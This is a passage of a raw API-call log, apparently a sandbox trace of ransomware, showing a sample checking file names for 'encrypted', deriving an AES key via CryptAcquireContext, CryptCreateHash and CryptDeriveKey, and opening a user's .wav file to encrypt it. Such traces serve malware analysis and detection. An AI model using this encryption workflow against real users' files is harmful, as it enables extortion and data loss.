lpString1="z\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DHh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hh8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VkXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kXOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XOg3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Og3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YdESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ESMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SMaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MaDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aDUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUlc.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.707] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.707] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.707] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.707] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.707] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.707] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.707] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.707] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.707] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x9a6973d0, ftLastWriteTime.dwHighDateTime=0x1d5bdff, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 0x7c2100 [0038.707] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.708] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.708] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.708] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.708] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.708] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.708] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.708] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.708] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.708] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0038.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.710] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.710] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.710] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.711] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.711] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.711] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.711] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.711] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.711] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.711] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.711] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.712] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.712] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.712] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.712] CryptHashData (hHash=0x7c2240, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.713] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.713] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.713] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.713] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0038.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.713] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.713] CryptDestroyHash (hHash=0x7c2240) returned 1 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.714] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\6ydesmadulc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, 